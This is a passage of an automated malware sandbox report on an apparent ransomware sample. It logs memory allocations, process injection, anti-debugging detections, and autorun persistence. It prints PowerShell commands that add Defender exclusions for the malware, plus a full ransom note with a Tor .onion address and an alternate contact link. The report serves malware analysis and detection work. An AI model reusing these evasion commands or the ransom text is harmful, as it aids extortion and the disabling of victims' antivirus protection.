NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00537000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0051a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0051c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6acd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6acd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02811000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02687000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2800 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (50 out of 594 events)

file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll
file	C:\Program Files (x86)\Hnc\Common80\him\HWBXIM10.DLL
file	C:\Program Files\Java\jre7\bin\hprof.dll
file	C:\Program Files (x86)\Hnc\Common80\ImgFilters\GS\gs8.60\lib\ps2pdf13.bat
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE11\msxml5.dll
file	C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Groove.en-us\GrooveMUI.msi
file	C:\Program Files (x86)\Hnc\Common80\HncXalMesg8.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\PROOF\1033\MSGR3EN.DLL
file	C:\MSOCache\All Users\{90120000-00A1-0412-0000-0000000FF1CE}-C\OneNoteMUI.msi
file	C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSSTKO32.DLL
file	C:\Program Files (x86)\Google\Update\1.3.33.7\psuser.dll
file	C:\MSOCache\All Users\{90120000-006E-0412-0000-0000000FF1CE}-C\msvcr80.dll
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_ca.dll
file	C:\Program Files\Java\jre7\bin\glib-lite.dll
file	C:\MSOCache\All Users\{90120000-0030-0000-0000-0000000FF1CE}-C\ose.exe
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\ACER3X.DLL
file	C:\Program Files\Java\jre7\bin\jp2native.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\ACEODBC.DLL
file	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MOFL.DLL
file	C:\Program Files (x86)\EditPlus\editplus.exe
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_fr.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\VS Runtime\1033\MSENVUI.DLL
file	C:\Program Files\Java\jre7\bin\java_crw_demo.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\ACEEXCH.DLL
file	C:\Program Files\Java\jre7\bin\sunmscapi.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\MODI\12.0\REVERSE.DLL
file	C:\Program Files\Java\jre7\bin\javafx-iio.dll
file	C:\Program Files (x86)\EditPlus\zen_coding_epp.js
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\ACEWSS.DLL
file	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\MSCONV97.DLL
file	C:\Program Files (x86)\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_nl.dll
file	C:\Program Files (x86)\Hnc\Common80\ImgFilters\GS\gs8.60\lib\ps2ps2.cmd
file	C:\Program Files\Common Files\Microsoft Shared\IME12\SHARED\IMEAPIS.DLL
file	C:\Program Files\Java\jre7\bin\jsoundds.dll
file	C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\Office64MUI.msi
file	C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\1033\EEINTL.DLL
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_fil.dll
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_pt-BR.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\1033\ALRTINTL.DLL
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_ja.dll
file	C:\Program Files (x86)\Common Files\microsoft shared\Help\2052\hxdsui.dll
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_fa.dll
file	C:\Program Files\Microsoft Office\Office12\MSOHEVI.DLL
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_ro.dll
file	C:\Program Files\Common Files\Microsoft Shared\IME12\IMEKR\MSVCR80.DLL
file	C:\Program Files (x86)\Google\Update\1.3.33.7\goopdateres_ru.dll
file	C:\Program Files (x86)\Hnc\Common80\ImgFilters\GS\gs8.60\lib\gstt.bat
file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\chrome_watcher.dll
file	C:\Program Files (x86)\Hnc\Common80\ImgFilters\GS\gs8.60\lib\ps2epsi.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 22, 2021, 9:03 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW Oct. 22, 2021, 9:03 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force filepath: powershell	1	1
ShellExecuteExW Oct. 22, 2021, 9:03 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force filepath: powershell	1	1
ShellExecuteExW Oct. 22, 2021, 9:03 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe	1	1
ShellExecuteExW Oct. 22, 2021, 9:03 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force filepath: powershell	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (12 events)

Time & API	Arguments	Status	Return
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: mobsync.exe process_identifier: 844	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 3064	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: taskhost.exe process_identifier: 2576	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: 101.exe process_identifier: 2948	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: powershell.exe process_identifier: 2800	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 1332	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: powershell.exe process_identifier: 2624	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 2724	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: powershell.exe process_identifier: 656	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 2932	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 2572	1	1
Process32NextW Oct. 22, 2021, 9:03 a.m.	snapshot_handle: 0x00000108 process_name: TrustedInstaller.exe process_identifier: 2764	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 22, 2021, 9:03 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (6 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 22, 2021, 9:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 22, 2021, 9:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 22, 2021, 9:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 22, 2021, 9:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 22, 2021, 9:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 22, 2021, 9:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (4 events)

url	http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101%s
url	https://yip.su/2QstD5
url	https://www.torproject.org/
url	http://schemas.openxmlformats.org/markup-compatibility/2006

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (14 events)

Time & API	Arguments	Status	Return
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1848 process_handle: 0x000002d8		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1848 process_handle: 0x000002d8	1	0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1396 process_handle: 0x000002dc		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1396 process_handle: 0x000002dc	1	0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1396 process_handle: 0x000002b8		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1396 process_handle: 0x000002b8		3221225738
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1468 process_handle: 0x000001c0		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 1468 process_handle: 0x000001c0	1	0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 968 process_handle: 0x00000328		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 968 process_handle: 0x00000328	1	0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 824 process_handle: 0x00000334		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 824 process_handle: 0x00000334	1	0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 824 process_handle: 0x000002c0		0
NtTerminateProcess Oct. 22, 2021, 9:03 a.m.	status_code: 0x00000000 process_identifier: 824 process_handle: 0x000002c0		3221225738

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2552 region_size: 126976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000074c		3221225496	0
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2492 region_size: 126976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001f8	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\鰢鱓鰨鱗鰣鰩鱀鰢鰠鱖鰢鰠鰢鱑鰣

reg_value

C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe

Creates known Hupigon files, registry keys and/or mutexes (1 event)

file	M:\Boot\BOOTSTAT.DAT

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 2948 manipulating memory of non-child process 2552
NtUnmapViewOfSection Oct. 22, 2021, 9:03 a.m.	base_address: 0x00400000 region_size: 446464 process_identifier: 2552 process_handle: 0x0000074c	3221225497	0
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2552 region_size: 126976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000074c	3221225496	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2948 called NtSetContextThread to modify thread in remote process 2492
NtSetContextThread Oct. 22, 2021, 9:03 a.m.	registers.eip: 2000355780 registers.esp: 3211060 registers.edi: 0 registers.eax: 4226208 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000760 process_identifier: 2492	1	0	0

url	http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101%s
url	https://www.torproject.org/

Writes a potential ransom message to disk (50 out of 498 events)

Time & API	Arguments	Status
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x0000012c filepath: C:\GPKI\Read_Me.txt	1
